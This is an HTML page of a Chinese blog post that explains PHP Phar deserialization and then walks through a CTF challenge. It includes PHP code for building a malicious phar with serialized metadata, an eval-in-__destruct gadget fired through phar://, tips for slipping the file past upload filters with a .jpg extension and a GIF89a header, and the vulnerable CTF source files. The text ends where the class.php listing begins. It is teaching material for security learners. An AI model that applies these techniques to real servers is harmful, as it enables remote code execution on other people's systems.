<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#6200ee"><meta name="author" content="m0re"><meta name="copyright" content="m0re"><meta name="generator" content="Hexo 5.1.0"><meta name="theme" content="hexo-theme-yun"><title>浅析Phar反序列化 | m0re的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.24/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_j5gk85dg4pf.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" href="/m0re.ico"><link rel="mask-icon" href="/m0re.ico" color="#6200ee"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"m0re.top","root":"/","title":"人生路漫漫","version":"1.6.1","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="成年人的世界里除了孤独就是压力，小时候真傻怎么老是幻想着长大🙄🙄文章同时发布在FreeBuf浅析Phar反序列化——原创奖励">
<meta property="og:type" content="article">
<meta property="og:title" content="浅析Phar反序列化">
<meta property="og:url" content="https://m0re.top/posts/8a280b82/index.html">
<meta property="og:site_name" content="m0re的小站">
<meta property="og:description" content="成年人的世界里除了孤独就是压力，小时候真傻怎么老是幻想着长大🙄🙄文章同时发布在FreeBuf浅析Phar反序列化——原创奖励">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/2021/09/06/23172_123230p9tul1xl91jj92c0.jpg">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730012302.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730085214.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210721152338.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730090955.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730094749.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730095701.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730100308.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730170303.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210802234525.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210803001624.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210803002516.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730173455.png">
<meta property="og:image" content="https://gitee.com/m0re/picture/raw/master/img/20210730180436.png">
<meta property="article:published_time" content="2021-09-06T02:19:47.789Z">
<meta property="article:modified_time" content="2021-12-04T07:14:15.663Z">
<meta property="article:author" content="m0re">
<meta property="article:tag" content="PHP反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/m0re/picture/raw/master/img/2021/09/06/23172_123230p9tul1xl91jj92c0.jpg"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="m0re"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="m0re"><span class="site-author-status" title="穷鬼啊啊啊啊">😭</span></a><div class="site-author-name"><a href="/about/">m0re</a></div><span class="site-name">m0re的小站</span><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">123</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">22</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">54</span></a></div><a class="site-state-item hty-icon-button" href="/Tools/" title="Tools"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/zxcv0221" title="GitHub" target="_blank" style="color:#181717"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="哔哩哔哩动画" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://twitter.com/ISm0r3" title="Twitter" target="_blank" style="color:#1da1f2"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-twitter-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:m0re.lxj@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00%E5%BC%95%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00引言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01Phar%E7%9B%B8%E5%85%B3%E5%9F%BA%E7%A1%80"><span class="toc-number">2.</span> <span class="toc-text">0x01Phar相关基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Phar%E6%96%87%E4%BB%B6%E7%BB%93%E6%9E%84"><span class="toc-number">2.1.</span> <span class="toc-text">Phar文件结构</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%9F%E6%88%90phar%E6%96%87%E4%BB%B6"><span class="toc-number">2.2.</span> <span class="toc-text">生成phar文件</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-CTF%E9%A2%98%E7%9B%AE%E5%AE%9E%E6%88%98"><span class="toc-number">3.</span> <span class="toc-text">0x02 CTF题目实战</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Dropbox"><span class="toc-number">3.1.</span> <span class="toc-text">Dropbox</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Baby-h-Master-PHP"><span class="toc-number">3.2.</span> <span class="toc-text">Baby^h Master PHP</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-%E6%89%A9%E5%B1%95%E5%86%85%E5%AE%B9"><span class="toc-number">4.</span> <span class="toc-text">0x03 扩展内容</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#mysql-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%87%BD%E6%95%B0-%E5%88%A9%E7%94%A8phar%E5%8D%8F%E8%AE%AE%E9%80%A0%E6%88%90php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">4.1.</span> <span class="toc-text">mysql 反序列化函数_利用phar协议造成php反序列化</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-Reference"><span class="toc-number">5.</span> <span class="toc-text">0x04 Reference</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://m0re.top/posts/8a280b82/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="m0re"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="m0re的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">浅析Phar反序列化</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <span class="post-meta-icon-text">发表于</span> <time title="创建时间：2021-09-06 10:19:47" itemprop="dateCreated datePublished" datetime="2021-09-06T10:19:47+08:00">2021-09-06</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-2-line"></use></svg></span> <span class="post-meta-icon-text">更新于</span> <time title="修改时间：2021-12-04 15:14:15" itemprop="dateModified" datetime="2021-12-04T15:14:15+08:00">2021-12-04</time></div><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><span class="leancloud_visitors" id="/posts/8a280b82/" data-flag-title="浅析Phar反序列化"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/PHP/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">PHP</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">PHP反序列化</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#6200ee;"><p><img src="https://gitee.com/m0re/picture/raw/master/img/2021/09/06/23172_123230p9tul1xl91jj92c0.jpg" alt="123230p9tul1xl91jj92c0" loading="lazy"><br>成年人的世界里除了孤独就是压力，小时候真傻怎么老是幻想着长大🙄🙄<br>文章同时发布在<a target="_blank" rel="noopener" href="https://www.freebuf.com/">FreeBuf</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/305292.html">浅析Phar反序列化</a>——原创奖励</p>
<a id="more"></a>

<h1 id="0x00引言"><a href="#0x00引言" class="headerlink" title="0x00引言"></a>0x00引言</h1><p>PHP反序列化常见的是使用<code>unserilize()</code>进行反序列化，除此之外还有其它的反序列化方法，不需要用到<code>unserilize()</code>。就是用到了本文的主要内容——phar反序列化。很多大佬都进行过总结，但是看了这个知识点的比较全的内容。我看了不下二十篇文章，最后写此文为方便自己以后查看。</p>
<h1 id="0x01Phar相关基础"><a href="#0x01Phar相关基础" class="headerlink" title="0x01Phar相关基础"></a>0x01Phar相关基础</h1><p>Phar是将php文件打包而成的一种压缩文档，类似于Java中的jar包。它有一个特性就是phar文件会以序列化的形式储存用户自定义的<code>meta-data</code>。以扩展反序列化漏洞的攻击面，配合<code>phar://</code>协议使用。</p>
<h2 id="Phar文件结构"><a href="#Phar文件结构" class="headerlink" title="Phar文件结构"></a>Phar文件结构</h2><ol>
<li><code>a stub</code>是一个文件标志，格式为 ：<code>xxx&lt;?php xxx;__HALT_COMPILER();?&gt;</code>。</li>
<li><code>manifest</code>是被压缩的文件的属性等放在这里，这部分是以序列化存储的，是主要的攻击点。</li>
<li><code>contents</code>是被压缩的内容。</li>
<li><code>signature</code> 签名，放在文件末尾。</li>
</ol>
<p>就是这个文件由四部分组成，每种文件都是有它独特的一种文件格式的，有首有尾。而<code>__HALT_COMPILER();</code>就是相当于图片中的文件头的功能，没有它，图片无法解析，同样的，没有文件头，php识别不出来它是phar文件，也就无法起作用。</p>
<h2 id="生成phar文件"><a href="#生成phar文件" class="headerlink" title="生成phar文件"></a>生成phar文件</h2><p>这里测试一下~<br>前提：生成phar文件需要修改php.ini中的配置，将<code>phar.readonly</code>设置为<code>Off</code><br><img src="https://gitee.com/m0re/picture/raw/master/img/20210730012302.png" loading="lazy"></p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token keyword">class</span> <span class="token class-name">test</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">public</span> <span class="token variable">$name</span><span class="token operator">=</span><span class="token single-quoted-string string">'phpinfo();'</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$phar</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">phar</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'test.phar'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//后缀名必须为phar</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">startBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">setStub</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"&lt;?php __HALT_COMPILER();?>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//设置stub</span>
<span class="token variable">$obj</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">test</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">setMetadata</span><span class="token punctuation">(</span><span class="token variable">$obj</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//自定义的meta-data存入manifest</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">addFromString</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"flag.txt"</span><span class="token punctuation">,</span><span class="token double-quoted-string string">"flag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//添加要压缩的文件</span>
<span class="token comment">//签名自动计算</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">stopBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span></code></pre>
<p>生成的phar文件，打开该文件可以看到文件头是<code>&lt;?php __halt_compiler(); ?&gt;</code>以及中间的部分内容是序列化的形式存在于这个文件中。<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210730085214.png" loading="lazy"></p>
<p>该方法在文件系统函数（<code>file_exists()</code>、<code>is_dir()</code>等）参数可控的情况下，配合phar://伪协议，可以不依赖<code>unserialize()</code>直接进行反序列化操作。<br><a target="_blank" rel="noopener" href="https://paper.seebug.org/680/">https://paper.seebug.org/680/</a>得知：有序列化数据必然会有反序列化操作，php一大部分的文件系统函数在通过<code>phar://</code>伪协议解析phar文件时，都会将<code>meta-data</code>进行反序列化，测试后受影响的函数如下：(仿照大佬的图)<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210721152338.png" loading="lazy"><br>这里使用<code>file_get_contents()</code>函数来进行实验。</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name">test</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$name</span><span class="token operator">=</span><span class="token single-quoted-string string">''</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">name</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'phar://test.phar/flag.txt'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span></code></pre>
<p><img src="https://gitee.com/m0re/picture/raw/master/img/20210730090955.png" loading="lazy"><br><code>__HALT_COMPILER();</code>必须大写，小写不会被识别出来。导致无法进行反序列化操作。<br>因为考虑到在上传的时候，可能只会允许上传图片(<code>jpg/png/gif</code>)，上传时将test.phar修改文件扩展名为jpg也可以进行反序列化，不会影响解析。<br>如果对文件头有识别的，也可以使用GIF文件头<code>GIF89a</code>来绕过检测，具体操作与文件上传部分细节类似，不再赘述。</p>
<h1 id="0x02-CTF题目实战"><a href="#0x02-CTF题目实战" class="headerlink" title="0x02 CTF题目实战"></a>0x02 CTF题目实战</h1><h2 id="Dropbox"><a href="#Dropbox" class="headerlink" title="Dropbox"></a>Dropbox</h2><p>登录注册功能，注册了一个账号，然后进行登录。发现只有一个上传功能，所以就随意上传一个文件，但是发现只能上传图片。<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210730094749.png" loading="lazy"><br>所以这里上传一个普通图片来测试。<br>上传成功后存在下载和删除功能，下载发现进行了跳转，并且浏览器不回显，这里抓包查看</p>
<p><img src="https://gitee.com/m0re/picture/raw/master/img/20210730095701.png" loading="lazy"><br>可能存在文件读取，这里尝试一下<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210730100308.png" loading="lazy"><br>但是无法读取<code>flag.php</code>所以还需要尝试其他办法，这里读取网站源码，进行查看。</p>
<pre class="language-php" data-language="php"><code class="language-php">#download.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'login'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Location: login.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">include</span> <span class="token double-quoted-string string">"class.php"</span><span class="token punctuation">;</span>
<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"open_basedir"</span><span class="token punctuation">,</span> <span class="token function">getcwd</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">":/etc:/tmp"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'sandbox'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">File</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$filename</span> <span class="token operator">=</span> <span class="token punctuation">(</span>string<span class="token punctuation">)</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">)</span> <span class="token operator">&lt;</span> <span class="token number">40</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">open</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">stristr</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">,</span> <span class="token double-quoted-string string">"flag"</span><span class="token punctuation">)</span> <span class="token operator">===</span> <span class="token boolean constant">false</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">Header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Content-type: application/octet-stream"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">Header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Content-Disposition: attachment; filename="</span> <span class="token punctuation">.</span> <span class="token function">basename</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">close</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">echo</span> <span class="token double-quoted-string string">"File not exist"</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>
<pre class="language-php" data-language="php"><code class="language-php">#delete.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'login'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Location: login.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">include</span> <span class="token double-quoted-string string">"class.php"</span><span class="token punctuation">;</span>

<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'sandbox'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">File</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$filename</span> <span class="token operator">=</span> <span class="token punctuation">(</span>string<span class="token punctuation">)</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">)</span> <span class="token operator">&lt;</span> <span class="token number">40</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">open</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">detele</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">Header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Content-type: application/json"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$response</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"success"</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token boolean constant">true</span><span class="token punctuation">,</span> <span class="token double-quoted-string string">"error"</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token double-quoted-string string">""</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token function">json_encode</span><span class="token punctuation">(</span><span class="token variable">$response</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
    <span class="token function">Header</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Content-type: application/json"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$response</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"success"</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token boolean constant">false</span><span class="token punctuation">,</span> <span class="token double-quoted-string string">"error"</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token double-quoted-string string">"File not exist"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token function">json_encode</span><span class="token punctuation">(</span><span class="token variable">$response</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>
<pre class="language-php" data-language="php"><code class="language-php">#class.php
#代码过长，选取重要部分
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
